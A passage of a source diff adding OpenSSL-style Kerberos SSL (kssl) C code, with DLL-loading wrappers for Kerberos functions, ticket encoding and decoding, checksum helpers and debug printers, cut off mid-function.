+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_sname_to_principal)
+        return (p_krb5_sname_to_principal(CO, pC1, pC2, I, pPR));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code kssl_krb5_cc_default(krb5_context CO, krb5_ccache *pCC)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_cc_default)
+        return (p_krb5_cc_default(CO, pCC));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code kssl_krb5_init_context(krb5_context *pCO)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_init_context)
+        return (p_krb5_init_context(pCO));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+void kssl_krb5_free_context(krb5_context CO)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_free_context)
+        p_krb5_free_context(CO);
+}
+
+void kssl_krb5_free_principal(krb5_context c, krb5_principal p)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_free_principal)
+        p_krb5_free_principal(c, p);
+}
+
+krb5_error_code
+kssl_krb5_kt_resolve(krb5_context con, krb5_const char *sz, krb5_keytab *kt)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_kt_resolve)
+        return (p_krb5_kt_resolve(con, sz, kt));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code kssl_krb5_kt_default(krb5_context con, krb5_keytab *kt)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_kt_default)
+        return (p_krb5_kt_default(con, kt));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code kssl_krb5_free_ticket(krb5_context con, krb5_ticket *kt)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_free_ticket)
+        return (p_krb5_free_ticket(con, kt));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+kssl_krb5_rd_req(krb5_context con, krb5_auth_context *pacon,
+                 krb5_const krb5_data *data,
+                 krb5_const_principal princ, krb5_keytab keytab,
+                 krb5_flags *flags, krb5_ticket **pptkt)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_rd_req)
+        return (p_krb5_rd_req(con, pacon, data, princ, keytab, flags, pptkt));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_boolean
+krb5_principal_compare(krb5_context con, krb5_const_principal princ1,
+                       krb5_const_principal princ2)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_principal_compare)
+        return (p_krb5_principal_compare(con, princ1, princ2));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+krb5_decrypt_tkt_part(krb5_context con, krb5_const krb5_keyblock *keys,
+                      krb5_ticket *ticket)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_decrypt_tkt_part)
+        return (p_krb5_decrypt_tkt_part(con, keys, ticket));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code krb5_timeofday(krb5_context con, krb5_int32 *timeret)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_timeofday)
+        return (p_krb5_timeofday(con, timeret));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code krb5_rc_default(krb5_context con, krb5_rcache *rc)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_rc_default)
+        return (p_krb5_rc_default(con, rc));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+krb5_rc_initialize(krb5_context con, krb5_rcache rc, krb5_deltat lifespan)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_rc_initialize)
+        return (p_krb5_rc_initialize(con, rc, lifespan));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+krb5_rc_get_lifespan(krb5_context con, krb5_rcache rc, krb5_deltat *lifespanp)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_rc_get_lifespan)
+        return (p_krb5_rc_get_lifespan(con, rc, lifespanp));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code krb5_rc_destroy(krb5_context con, krb5_rcache rc)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_rc_destroy)
+        return (p_krb5_rc_destroy(con, rc));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+size_t krb5_checksum_size(krb5_context context, krb5_cksumtype ctype)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_checksum_size)
+        return (p_krb5_checksum_size(context, ctype));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_boolean valid_cksumtype(krb5_cksumtype ctype)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_valid_cksumtype)
+        return (p_valid_cksumtype(ctype));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code krb5_kt_free_entry(krb5_context con, krb5_keytab_entry *entry)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_kt_free_entry)
+        return (p_krb5_kt_free_entry(con, entry));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+/* Structure definitions  */
+#  ifndef NO_DEF_KRB5_CCACHE
+#   ifndef krb5_x
+#    define krb5_x(ptr,args) ((ptr)?((*(ptr)) args):(abort(),1))
+#    define krb5_xc(ptr,args) ((ptr)?((*(ptr)) args):(abort(),(char*)0))
+#   endif
+
+typedef krb5_pointer krb5_cc_cursor; /* cursor for sequential lookup */
+
+typedef struct _krb5_ccache {
+    krb5_magic magic;
+    struct _krb5_cc_ops FAR *ops;
+    krb5_pointer data;
+} *krb5_ccache;
+
+typedef struct _krb5_cc_ops {
+    krb5_magic magic;
+    char *prefix;
+    char *(KRB5_CALLCONV *get_name)
+     (krb5_context, krb5_ccache);
+     krb5_error_code(KRB5_CALLCONV *resolve)
+     (krb5_context, krb5_ccache *, const char *);
+     krb5_error_code(KRB5_CALLCONV *gen_new)
+     (krb5_context, krb5_ccache *);
+     krb5_error_code(KRB5_CALLCONV *init)
+     (krb5_context, krb5_ccache, krb5_principal);
+     krb5_error_code(KRB5_CALLCONV *destroy)
+     (krb5_context, krb5_ccache);
+     krb5_error_code(KRB5_CALLCONV *close)
+     (krb5_context, krb5_ccache);
+     krb5_error_code(KRB5_CALLCONV *store)
+     (krb5_context, krb5_ccache, krb5_creds *);
+     krb5_error_code(KRB5_CALLCONV *retrieve)
+     (krb5_context, krb5_ccache, krb5_flags, krb5_creds *, krb5_creds *);
+     krb5_error_code(KRB5_CALLCONV *get_princ)
+     (krb5_context, krb5_ccache, krb5_principal *);
+     krb5_error_code(KRB5_CALLCONV *get_first)
+     (krb5_context, krb5_ccache, krb5_cc_cursor *);
+     krb5_error_code(KRB5_CALLCONV *get_next)
+     (krb5_context, krb5_ccache, krb5_cc_cursor *, krb5_creds *);
+     krb5_error_code(KRB5_CALLCONV *end_get)
+     (krb5_context, krb5_ccache, krb5_cc_cursor *);
+     krb5_error_code(KRB5_CALLCONV *remove_cred)
+     (krb5_context, krb5_ccache, krb5_flags, krb5_creds *);
+     krb5_error_code(KRB5_CALLCONV *set_flags)
+     (krb5_context, krb5_ccache, krb5_flags);
+} krb5_cc_ops;
+#  endif                        /* NO_DEF_KRB5_CCACHE */
+
+krb5_error_code
+    kssl_krb5_cc_get_principal
+    (krb5_context context, krb5_ccache cache, krb5_principal *principal) {
+    if (p_krb5_cc_get_principal)
+        return (p_krb5_cc_get_principal(context, cache, principal));
+    else
+        return (krb5_x((cache)->ops->get_princ, (context, cache, principal)));
+}
+
+krb5_error_code
+kssl_krb5_auth_con_setrcache(krb5_context con, krb5_auth_context acon,
+                             krb5_rcache rcache)
+{
+    if (p_krb5_auth_con_setrcache)
+        return (p_krb5_auth_con_setrcache(con, acon, rcache));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+kssl_krb5_get_server_rcache(krb5_context con, krb5_const krb5_data *data,
+                            krb5_rcache *rcache)
+{
+    if (p_krb5_get_server_rcache)
+        return (p_krb5_get_server_rcache(con, data, rcache));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+kssl_krb5_auth_con_getrcache(krb5_context con, krb5_auth_context acon,
+                             krb5_rcache *prcache)
+{
+    if (p_krb5_auth_con_getrcache)
+        return (p_krb5_auth_con_getrcache(con, acon, prcache));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code kssl_krb5_kt_close(krb5_context context, krb5_keytab keytab)
+{
+    if (p_krb5_kt_close)
+        return (p_krb5_kt_close(context, keytab));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+kssl_krb5_kt_get_entry(krb5_context context, krb5_keytab keytab,
+                       krb5_const_principal principal, krb5_kvno vno,
+                       krb5_enctype enctype, krb5_keytab_entry *entry)
+{
+    if (p_krb5_kt_get_entry)
+        return (p_krb5_kt_get_entry
+                (context, keytab, principal, vno, enctype, entry));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+# endif                         /* OPENSSL_SYS_WINDOWS || OPENSSL_SYS_WIN32 */
+
+/*
+ * memory allocation functions for non-temporary storage (e.g. stuff that
+ * gets saved into the kssl context)
+ */
+static void *kssl_calloc(size_t nmemb, size_t size)
+{
+    void *p;
+
+    p = OPENSSL_malloc(nmemb * size);
+    if (p) {
+        memset(p, 0, nmemb * size);
+    }
+    return p;
+}
+
+# define kssl_malloc(size) OPENSSL_malloc((size))
+# define kssl_realloc(ptr, size) OPENSSL_realloc(ptr, size)
+# define kssl_free(ptr) OPENSSL_free((ptr))
+
+char
+*kstring(char *string)
+{
+    static char *null = "[NULL]";
+
+    return ((string == NULL) ? null : string);
+}
+
+/*
+ * Given KRB5 enctype (basically DES or 3DES), return closest match openssl
+ * EVP_ encryption algorithm.  Return NULL for unknown or problematic
+ * (krb5_dk_encrypt) enctypes.  Assume ENCTYPE_*_RAW (krb5_raw_encrypt) are
+ * OK.
+ */
+const EVP_CIPHER *kssl_map_enc(krb5_enctype enctype)
+{
+    switch (enctype) {
+    case ENCTYPE_DES_HMAC_SHA1: /* EVP_des_cbc(); */
+    case ENCTYPE_DES_CBC_CRC:
+    case ENCTYPE_DES_CBC_MD4:
+    case ENCTYPE_DES_CBC_MD5:
+    case ENCTYPE_DES_CBC_RAW:
+        return EVP_des_cbc();
+        break;
+    case ENCTYPE_DES3_CBC_SHA1: /* EVP_des_ede3_cbc(); */
+    case ENCTYPE_DES3_CBC_SHA:
+    case ENCTYPE_DES3_CBC_RAW:
+        return EVP_des_ede3_cbc();
+        break;
+    default:
+        return NULL;
+        break;
+    }
+}
+
+/*
+ * Return true:1 if p "looks like" the start of the real authenticator
+ * described in kssl_skip_confound() below.  The ASN.1 pattern is "62 xx 30
+ * yy" (APPLICATION-2, SEQUENCE), where xx-yy =~ 2, and xx and yy are
+ * possibly multi-byte length fields.
+ */
+static int kssl_test_confound(unsigned char *p)
+{
+    int len = 2;
+    int xx = 0, yy = 0;
+
+    if (*p++ != 0x62)
+        return 0;
+    if (*p > 0x82)
+        return 0;
+    switch (*p) {
+    case 0x82:
+        p++;
+        xx = (*p++ << 8);
+        xx += *p++;
+        break;
+    case 0x81:
+        p++;
+        xx = *p++;
+        break;
+    case 0x80:
+        return 0;
+    default:
+        xx = *p++;
+        break;
+    }
+    if (*p++ != 0x30)
+        return 0;
+    if (*p > 0x82)
+        return 0;
+    switch (*p) {
+    case 0x82:
+        p++;
+        len += 2;
+        yy = (*p++ << 8);
+        yy += *p++;
+        break;
+    case 0x81:
+        p++;
+        len++;
+        yy = *p++;
+        break;
+    case 0x80:
+        return 0;
+    default:
+        yy = *p++;
+        break;
+    }
+
+    return (xx - len == yy) ? 1 : 0;
+}
+
+/*
+ * Allocate, fill, and return cksumlens array of checksum lengths.  This
+ * array holds just the unique elements from the krb5_cksumarray[].  array[n]
+ * == 0 signals end of data.  The krb5_cksumarray[] was an internal variable
+ * that has since been replaced by a more general method for storing the
+ * data.  It should not be used.  Instead we use real API calls and make a
+ * guess for what the highest assigned CKSUMTYPE_ constant is.  As of 1.2.2
+ * it is 0x000c (CKSUMTYPE_HMAC_SHA1_DES3).  So we will use 0x0010.
+ */
+static size_t *populate_cksumlens(void)
+{
+    int i, j, n;
+    static size_t *cklens = NULL;
+
+# ifdef KRB5_MIT_OLD11
+    n = krb5_max_cksum;
+# else
+    n = 0x0010;
+# endif                         /* KRB5_MIT_OLD11 */
+
+# ifdef KRB5CHECKAUTH
+    if (!cklens && !(cklens = (size_t *)calloc(sizeof(int), n + 1)))
+        return NULL;
+
+    for (i = 0; i < n; i++) {
+        if (!valid_cksumtype(i))
+            continue;           /* array has holes */
+        for (j = 0; j < n; j++) {
+            if (cklens[j] == 0) {
+                cklens[j] = krb5_checksum_size(NULL, i);
+                break;          /* krb5 elem was new: add */
+            }
+            if (cklens[j] == krb5_checksum_size(NULL, i)) {
+                break;          /* ignore duplicate elements */
+            }
+        }
+    }
+# endif                         /* KRB5CHECKAUTH */
+
+    return cklens;
+}
+
+/*-
+ *      Return pointer to start of real authenticator within authenticator, or
+ *      return NULL on error.
+ *      Decrypted authenticator looks like this:
+ *              [0 or 8 byte confounder] [4-24 byte checksum] [real authent'r]
+ *      This hackery wouldn't be necessary if MIT KRB5 1.0.6 had the
+ *      krb5_auth_con_getcksumtype() function advertised in its krb5.h.
+ */
+unsigned char *kssl_skip_confound(krb5_enctype etype, unsigned char *a)
+{
+    int i, conlen;
+    size_t cklen;
+    static size_t *cksumlens = NULL;
+    unsigned char *test_auth;
+
+    conlen = (etype) ? 8 : 0;
+
+    if (!cksumlens && !(cksumlens = populate_cksumlens()))
+        return NULL;
+    for (i = 0; (cklen = cksumlens[i]) != 0; i++) {
+        test_auth = a + conlen + cklen;
+        if (kssl_test_confound(test_auth))
+            return test_auth;
+    }
+
+    return NULL;
+}
+
+/*
+ * Set kssl_err error info when reason text is a simple string kssl_err =
+ * struct { int reason; char text[KSSL_ERR_MAX+1]; }
+ */
+void kssl_err_set(KSSL_ERR *kssl_err, int reason, char *text)
+{
+    if (kssl_err == NULL)
+        return;
+
+    kssl_err->reason = reason;
+    BIO_snprintf(kssl_err->text, KSSL_ERR_MAX, "%s", text);
+    return;
+}
+
+/*
+ * Display contents of krb5_data struct, for debugging
+ */
+void print_krb5_data(char *label, krb5_data *kdata)
+{
+    int i;
+
+    fprintf(stderr, "%s[%d] ", label, kdata->length);
+    for (i = 0; i < (int)kdata->length; i++) {
+        if (0 && isprint((int)kdata->data[i]))
+            fprintf(stderr, "%c ", kdata->data[i]);
+        else
+            fprintf(stderr, "%02x ", (unsigned char)kdata->data[i]);
+    }
+    fprintf(stderr, "\n");
+}
+
+/*
+ * Display contents of krb5_authdata struct, for debugging
+ */
+void print_krb5_authdata(char *label, krb5_authdata **adata)
+{
+    if (adata == NULL) {
+        fprintf(stderr, "%s, authdata==0\n", label);
+        return;
+    }
+    fprintf(stderr, "%s [%p]\n", label, (void *)adata);
+# if 0
+    {
+        int i;
+        fprintf(stderr, "%s[at%d:%d] ", label, adata->ad_type, adata->length);
+        for (i = 0; i < adata->length; i++) {
+            fprintf(stderr, (isprint(adata->contents[i])) ? "%c " : "%02x",
+                    adata->contents[i]);
+        }
+        fprintf(stderr, "\n");
+    }
+# endif
+}
+
+/*
+ * Display contents of krb5_keyblock struct, for debugging
+ */
+void print_krb5_keyblock(char *label, krb5_keyblock *keyblk)
+{
+    int i;
+
+    if (keyblk == NULL) {
+        fprintf(stderr, "%s, keyblk==0\n", label);
+        return;
+    }
+# ifdef KRB5_HEIMDAL
+    fprintf(stderr, "%s\n\t[et%d:%d]: ", label, keyblk->keytype,
+            keyblk->keyvalue->length);
+    for (i = 0; i < (int)keyblk->keyvalue->length; i++) {
+        fprintf(stderr, "%02x",
+                (unsigned char *)(keyblk->keyvalue->contents)[i]);
+    }
+    fprintf(stderr, "\n");
+# else
+    fprintf(stderr, "%s\n\t[et%d:%d]: ", label, keyblk->enctype,
+            keyblk->length);
+    for (i = 0; i < (int)keyblk->length; i++) {
+        fprintf(stderr, "%02x", keyblk->contents[i]);
+    }
+    fprintf(stderr, "\n");
+# endif
+}
+
+/*
+ * Display contents of krb5_principal_data struct, for debugging
+ * (krb5_principal is typedef'd == krb5_principal_data *)
+ */
+static void print_krb5_princ(char *label, krb5_principal_data *princ)
+{
+    int i, ui, uj;
+
+    fprintf(stderr, "%s principal Realm: ", label);
+    if (princ == NULL)
+        return;
+    for (ui = 0; ui < (int)princ->realm.length; ui++)
+        putchar(princ->realm.data[ui]);
+    fprintf(stderr, " (nametype %d) has %d strings:\n", princ->type,
+            princ->length);
+    for (i = 0; i < (int)princ->length; i++) {
+        fprintf(stderr, "\t%d [%d]: ", i, princ->data[i].length);
+        for (uj = 0; uj < (int)princ->data[i].length; uj++) {
+            putchar(princ->data[i].data[uj]);
+        }
+        fprintf(stderr, "\n");
+    }
+    return;
+}
+
+/*-     Given krb5 service (typically "kssl") and hostname in kssl_ctx,
+ *      Return encrypted Kerberos ticket for service @ hostname.
+ *      If authenp is non-NULL, also return encrypted authenticator,
+ *      whose data should be freed by caller.
+ *      (Originally was: Create Kerberos AP_REQ message for SSL Client.)
+ *
+ *      19990628        VRS     Started; Returns Kerberos AP_REQ message.
+ *      20010409        VRS     Modified for RFC2712; Returns enc tkt.
+ *      20010606        VRS     May also return optional authenticator.
+ */
+krb5_error_code kssl_cget_tkt( /* UPDATE */ KSSL_CTX *kssl_ctx,
+                              /*
+                               * OUT
+                               */ krb5_data **enc_ticketp,
+                              /*
+                               * UPDATE
+                               */ krb5_data *authenp,
+                              /*
+                               * OUT
+                               */ KSSL_ERR *kssl_err)
+{
+    krb5_error_code krb5rc = KRB5KRB_ERR_GENERIC;
+    krb5_context krb5context = NULL;
+    krb5_auth_context krb5auth_context = NULL;
+    krb5_ccache krb5ccdef = NULL;
+    krb5_creds krb5creds, *krb5credsp = NULL;
+    krb5_data krb5_app_req;
+
+    kssl_err_set(kssl_err, 0, "");
+    memset((char *)&krb5creds, 0, sizeof(krb5creds));
+
+    if (!kssl_ctx) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT, "No kssl_ctx defined.\n");
+        goto err;
+    } else if (!kssl_ctx->service_host) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "kssl_ctx service_host undefined.\n");
+        goto err;
+    }
+
+    if ((krb5rc = krb5_init_context(&krb5context)) != 0) {
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "krb5_init_context() fails: %d\n", krb5rc);
+        kssl_err->reason = SSL_R_KRB5_C_INIT;
+        goto err;
+    }
+
+    if ((krb5rc = krb5_sname_to_principal(krb5context,
+                                          kssl_ctx->service_host,
+                                          (kssl_ctx->service_name) ?
+                                          kssl_ctx->service_name : KRB5SVC,
+                                          KRB5_NT_SRV_HST,
+                                          &krb5creds.server)) != 0) {
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "krb5_sname_to_principal() fails for %s/%s\n",
+                     kssl_ctx->service_host,
+                     (kssl_ctx->
+                      service_name) ? kssl_ctx->service_name : KRB5SVC);
+        kssl_err->reason = SSL_R_KRB5_C_INIT;
+        goto err;
+    }
+
+    if ((krb5rc = krb5_cc_default(krb5context, &krb5ccdef)) != 0) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_C_CC_PRINC,
+                     "krb5_cc_default fails.\n");
+        goto err;
+    }
+
+    if ((krb5rc = krb5_cc_get_principal(krb5context, krb5ccdef,
+                                        &krb5creds.client)) != 0) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_C_CC_PRINC,
+                     "krb5_cc_get_principal() fails.\n");
+        goto err;
+    }
+
+    if ((krb5rc = krb5_get_credentials(krb5context, 0, krb5ccdef,
+                                       &krb5creds, &krb5credsp)) != 0) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_C_GET_CRED,
+                     "krb5_get_credentials() fails.\n");
+        goto err;
+    }
+
+    *enc_ticketp = &krb5credsp->ticket;
+# ifdef KRB5_HEIMDAL
+    kssl_ctx->enctype = krb5credsp->session.keytype;
+# else
+    kssl_ctx->enctype = krb5credsp->keyblock.enctype;
+# endif
+
+    krb5rc = KRB5KRB_ERR_GENERIC;
+    /*      caller should free data of krb5_app_req  */
+    /*
+     * 20010406 VRS deleted for real KerberosWrapper 20010605 VRS reinstated
+     * to offer Authenticator to KerberosWrapper
+     */
+    krb5_app_req.length = 0;
+    if (authenp) {
+        krb5_data krb5in_data;
+        const unsigned char *p;
+        long arlen;
+        KRB5_APREQBODY *ap_req;
+
+        authenp->length = 0;
+        krb5in_data.data = NULL;
+        krb5in_data.length = 0;
+        if ((krb5rc = krb5_mk_req_extended(krb5context,
+                                           &krb5auth_context, 0, &krb5in_data,
+                                           krb5credsp, &krb5_app_req)) != 0) {
+            kssl_err_set(kssl_err, SSL_R_KRB5_C_MK_REQ,
+                         "krb5_mk_req_extended() fails.\n");
+            goto err;
+        }
+
+        arlen = krb5_app_req.length;
+        p = (unsigned char *)krb5_app_req.data;
+        ap_req = (KRB5_APREQBODY *)d2i_KRB5_APREQ(NULL, &p, arlen);
+        if (ap_req) {
+            authenp->length = i2d_KRB5_ENCDATA(ap_req->authenticator, NULL);
+            if (authenp->length && (authenp->data = malloc(authenp->length))) {
+                unsigned char *adp = (unsigned char *)authenp->data;
+                authenp->length =
+                    i2d_KRB5_ENCDATA(ap_req->authenticator, &adp);
+            }
+        }
+
+        if (ap_req)
+            KRB5_APREQ_free((KRB5_APREQ *) ap_req);
+        if (krb5_app_req.length)
+            kssl_krb5_free_data_contents(krb5context, &krb5_app_req);
+    }
+# ifdef KRB5_HEIMDAL
+    if (kssl_ctx_setkey(kssl_ctx, &krb5credsp->session)) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_C_INIT,
+                     "kssl_ctx_setkey() fails.\n");
+    }
+# else
+    if (kssl_ctx_setkey(kssl_ctx, &krb5credsp->keyblock)) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_C_INIT,
+                     "kssl_ctx_setkey() fails.\n");
+    }
+# endif
+    else
+        krb5rc = 0;
+
+ err:
+# ifdef KSSL_DEBUG
+    kssl_ctx_show(kssl_ctx);
+# endif                         /* KSSL_DEBUG */
+
+    if (krb5creds.client)
+        krb5_free_principal(krb5context, krb5creds.client);
+    if (krb5creds.server)
+        krb5_free_principal(krb5context, krb5creds.server);
+    if (krb5auth_context)
+        krb5_auth_con_free(krb5context, krb5auth_context);
+    if (krb5context)
+        krb5_free_context(krb5context);
+    return (krb5rc);
+}
+
+/*-
+ *  Given d2i_-decoded asn1ticket, allocate and return a new krb5_ticket.
+ *  Return Kerberos error code and kssl_err struct on error.
+ *  Allocates krb5_ticket and krb5_principal; caller should free these.
+ *
+ *      20010410        VRS     Implemented krb5_decode_ticket() as
+ *                              old_krb5_decode_ticket(). Missing from MIT1.0.6.
+ *      20010615        VRS     Re-cast as openssl/asn1 d2i_*() functions.
+ *                              Re-used some of the old krb5_decode_ticket()
+ *                              code here.  This tkt should alloc/free just
+ *                              like the real thing.
+ */
+static krb5_error_code kssl_TKT2tkt( /* IN */ krb5_context krb5context,
+                                    /*
+                                     * IN
+                                     */ KRB5_TKTBODY *asn1ticket,
+                                    /*
+                                     * OUT
+                                     */ krb5_ticket **krb5ticket,
+                                    /*
+                                     * OUT
+                                     */ KSSL_ERR *kssl_err)
+{
+    krb5_error_code krb5rc = KRB5KRB_ERR_GENERIC;
+    krb5_ticket *new5ticket = NULL;
+    ASN1_GENERALSTRING *gstr_svc, *gstr_host;
+
+    *krb5ticket = NULL;
+
+    if (asn1ticket == NULL || asn1ticket->realm == NULL ||
+        asn1ticket->sname == NULL ||
+        sk_ASN1_GENERALSTRING_num(asn1ticket->sname->namestring) < 2) {
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "Null field in asn1ticket.\n");
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        return KRB5KRB_ERR_GENERIC;
+    }
+
+    if ((new5ticket = (krb5_ticket *)calloc(1, sizeof(krb5_ticket))) == NULL) {
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "Unable to allocate new krb5_ticket.\n");
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        return ENOMEM;          /* or KRB5KRB_ERR_GENERIC; */
+    }
+
+    gstr_svc = sk_ASN1_GENERALSTRING_value(asn1ticket->sname->namestring, 0);
+    gstr_host = sk_ASN1_GENERALSTRING_value(asn1ticket->sname->namestring, 1);
+
+    if ((krb5rc = kssl_build_principal_2(krb5context,
+                                         &new5ticket->server,
+                                         asn1ticket->realm->length,
+                                         (char *)asn1ticket->realm->data,
+                                         gstr_svc->length,
+                                         (char *)gstr_svc->data,
+                                         gstr_host->length,
+                                         (char *)gstr_host->data)) != 0) {
+        free(new5ticket);
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "Error building ticket server principal.\n");
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        return krb5rc;          /* or KRB5KRB_ERR_GENERIC; */
+    }
+
+    krb5_princ_type(krb5context, new5ticket->server) =
+        asn1ticket->sname->nametype->data[0];
+    new5ticket->enc_part.enctype = asn1ticket->encdata->etype->data[0];
+    new5ticket->enc_part.kvno = asn1ticket->encdata->kvno->data[0];
+    new5ticket->enc_part.ciphertext.length =
+        asn1ticket->encdata->cipher->length;
+    if ((new5ticket->enc_part.ciphertext.data =
+         calloc(1, asn1ticket->encdata->cipher->length)) == NULL) {
+        free(new5ticket);
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "Error allocating cipher in krb5ticket.\n");
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        return KRB5KRB_ERR_GENERIC;
+    } else {
+        memcpy(new5ticket->enc_part.ciphertext.data,
+               asn1ticket->encdata->cipher->data,
+               asn1ticket->encdata->cipher->length);
+    }
+
+    *krb5ticket = new5ticket;
+    return 0;
+}
+
+/*-
+ *      Given krb5 service name in KSSL_CTX *kssl_ctx (typically "kssl"),
+ *              and krb5 AP_REQ message & message length,
+ *      Return Kerberos session key and client principle
+ *              to SSL Server in KSSL_CTX *kssl_ctx.
+ *
+ *      19990702        VRS     Started.
+ */
+krb5_error_code kssl_sget_tkt( /* UPDATE */ KSSL_CTX *kssl_ctx,
+                              /*
+                               * IN
+                               */ krb5_data *indata,
+                              /*
+                               * OUT
+                               */ krb5_ticket_times *ttimes,
+                              /*
+                               * OUT
+                               */ KSSL_ERR *kssl_err)
+{
+    krb5_error_code krb5rc = KRB5KRB_ERR_GENERIC;
+    static krb5_context krb5context = NULL;
+    static krb5_auth_context krb5auth_context = NULL;
+    krb5_ticket *krb5ticket = NULL;
+    KRB5_TKTBODY *asn1ticket = NULL;
+    const unsigned char *p;
+    krb5_keytab krb5keytab = NULL;
+    krb5_keytab_entry kt_entry;
+    krb5_principal krb5server;
+    krb5_rcache rcache = NULL;
+
+    kssl_err_set(kssl_err, 0, "");
+
+    if (!kssl_ctx) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT, "No kssl_ctx defined.\n");
+        goto err;
+    }
+# ifdef KSSL_DEBUG
+    fprintf(stderr, "in kssl_sget_tkt(%s)\n",
+            kstring(kssl_ctx->service_name));
+# endif                         /* KSSL_DEBUG */
+
+    if (!krb5context && (krb5rc = krb5_init_context(&krb5context))) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "krb5_init_context() fails.\n");
+        goto err;
+    }
+    if (krb5auth_context &&
+        (krb5rc = krb5_auth_con_free(krb5context, krb5auth_context))) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "krb5_auth_con_free() fails.\n");
+        goto err;
+    } else
+        krb5auth_context = NULL;
+    if (!krb5auth_context &&
+        (krb5rc = krb5_auth_con_init(krb5context, &krb5auth_context))) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "krb5_auth_con_init() fails.\n");
+        goto err;
+    }
+
+    if ((krb5rc = krb5_auth_con_getrcache(krb5context, krb5auth_context,
+                                          &rcache))) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "krb5_auth_con_getrcache() fails.\n");
+        goto err;
+    }
+
+    if ((krb5rc = krb5_sname_to_principal(krb5context, NULL,
+                                          (kssl_ctx->service_name) ?
+                                          kssl_ctx->service_name : KRB5SVC,
+                                          KRB5_NT_SRV_HST,
+                                          &krb5server)) != 0) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "krb5_sname_to_principal() fails.\n");
+        goto err;
+    }
+
+    if (rcache == NULL) {
+        if ((krb5rc = krb5_get_server_rcache(krb5context,
+                                             krb5_princ_component(krb5context,
+                                                                  krb5server,
+                                                                  0),
+                                             &rcache))) {
+            kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                         "krb5_get_server_rcache() fails.\n");
+            goto err;
+        }
+    }
+
+    if ((krb5rc =
+         krb5_auth_con_setrcache(krb5context, krb5auth_context, rcache))) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "krb5_auth_con_setrcache() fails.\n");
+        goto err;
+    }
+
+    /*
+     * kssl_ctx->keytab_file == NULL ==> use Kerberos default
+     */
+    if (kssl_ctx->keytab_file) {
